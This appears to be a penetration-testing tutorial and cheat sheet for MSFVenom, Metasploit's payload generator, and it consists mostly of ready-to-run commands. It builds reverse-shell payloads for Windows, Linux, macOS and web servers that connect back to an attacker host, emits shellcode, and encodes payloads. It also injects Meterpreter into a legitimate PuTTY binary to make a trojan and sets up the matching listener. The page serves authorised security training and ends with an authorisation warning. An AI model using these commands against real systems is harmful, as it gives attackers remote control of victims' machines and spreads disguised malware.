Skip to content

🧪 Introduction to MSFVenom

MSFVenom is Metasploit's standalone payload generator and encoder. It combines the functionality of the old msfpayload and msfencode tools into a single utility. Use it to generate payloads in virtually any format — from raw shellcode to Windows executables, Python scripts, PowerShell one-liners, and more.

1️⃣ Basic Syntax

msfvenom -p <payload> [options] -f <format> -o <output_file>
Flag Description
-p Payload to use (e.g., windows/meterpreter/reverse_tcp).
-f Output format (e.g., exe, elf, raw, python, c, ps1).
-o Output file path.
-e Encoder to use (e.g., x86/shikata_ga_nai).
-i Number of encoding iterations.
-b Bad characters to avoid (e.g., '\x00\x0a\x0d').
-a Architecture (x86, x64).
--platform Target platform (windows, linux, osx).
-n NOP sled size (prepend NOP instructions).
-l List available payloads, formats, encoders, etc.

2️⃣ Listing Available Options

# List all payloads
msfvenom -l payloads

# List all formats
msfvenom -l formats

# List all encoders
msfvenom -l encoders

# List all platforms
msfvenom -l platforms

# List all architectures
msfvenom -l archs

3️⃣ Common Payload Generation Examples

Windows Reverse Shell (EXE)

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f exe -o shell.exe

Windows Reverse Shell (Staged, x86)

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f exe -o shell_x86.exe

Linux Reverse Shell (ELF)

msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f elf -o shell.elf

macOS Reverse Shell (Mach-O)

msfvenom -p osx/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f macho -o shell.macho

PHP Reverse Shell

msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f raw -o shell.php

Python Reverse Shell

msfvenom -p python/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f raw -o shell.py

ASP Reverse Shell (IIS)

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f asp -o shell.asp

ASPX Reverse Shell

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f aspx -o shell.aspx

JSP Reverse Shell (Tomcat)

msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f raw -o shell.jsp

WAR File (Tomcat Deployment)

msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f war -o shell.war

4️⃣ Generating Shellcode

For buffer overflow exploits, you need raw shellcode in various programming language formats:

C Format

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00' \
  -f c

Output: 

unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b..."

Python Format

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00' \
  -f python

PowerShell Base64

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f psh -o shell.ps1

Raw Shellcode (for custom exploit development)

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00\x0a\x0d' \
  -f raw -o shellcode.bin

5️⃣ Encoding Payloads

# Single encoder, multiple iterations
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o encoded_shell.exe

# Avoid specific bad characters (encoder is auto-selected)
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00\x0a\x0d\xff' \
  -f exe -o no_bad_chars.exe

6️⃣ Injecting into Existing Executables

You can inject a payload into a legitimate executable to make it look less suspicious:

# Inject Meterpreter into a legitimate program
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -x /path/to/putty.exe \
  -k \
  -f exe -o trojan_putty.exe
Flag Description
-x Template executable to inject into.
-k Keep the original executable's functionality (the payload runs in a separate thread).

Note

The -k flag doesn't work reliably with all executables. The resulting binary may crash or behave unexpectedly. Always test in a lab.

7️⃣ Setting Up the Listener

After generating a payload with MSFVenom, you must set up a matching handler in MSFconsole:

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 4444
msf6 > exploit -j

[*] Started reverse TCP handler on 10.10.14.2:4444

Tip

The payload, LHOST, and LPORT in the handler must exactly match what you specified in the MSFVenom command. A mismatch will cause the connection to fail silently.

8️⃣ Quick Reference Cheat Sheet

Target Payload Format
Windows x64 windows/x64/meterpreter/reverse_tcp -f exe
Windows x86 windows/meterpreter/reverse_tcp -f exe
Linux x64 linux/x64/meterpreter/reverse_tcp -f elf
macOS osx/x64/meterpreter/reverse_tcp -f macho
PHP Web Shell php/meterpreter/reverse_tcp -f raw
ASP Web Shell windows/meterpreter/reverse_tcp -f asp
JSP Web Shell java/jsp_shell_reverse_tcp -f raw
WAR (Tomcat) java/jsp_shell_reverse_tcp -f war
Python python/meterpreter/reverse_tcp -f raw
PowerShell windows/x64/meterpreter/reverse_tcp -f psh
C Shellcode windows/shell_reverse_tcp -f c

9️⃣ Gotchas

Note

Staged payloads need a handler. If you generate a staged payload (e.g., meterpreter/reverse_tcp) and deliver it without a running multi/handler, the stager will connect back but then die because nothing serves the stage. Use inline/singles (e.g., shell_reverse_tcp) when a handler isn't practical.

Note

Architecture matters. A 32-bit payload won't work on a 64-bit-only process, and vice versa. If you're unsure, generate both and test.

Note

Modern AV detects MSFVenom payloads. Default MSFVenom output is well-known to every antivirus vendor. For real engagements, you'll need additional obfuscation, custom packers, or evasion frameworks (see Firewall & IDS/IPS Evasion).

Note

PHP payloads need <?php ... ?> tags. The raw format for PHP payloads may not include the opening tag. Manually prepend <?php if needed.

Warning

MSFVenom generates weaponized payloads. Only create and deploy payloads against systems you have explicit written authorization to test.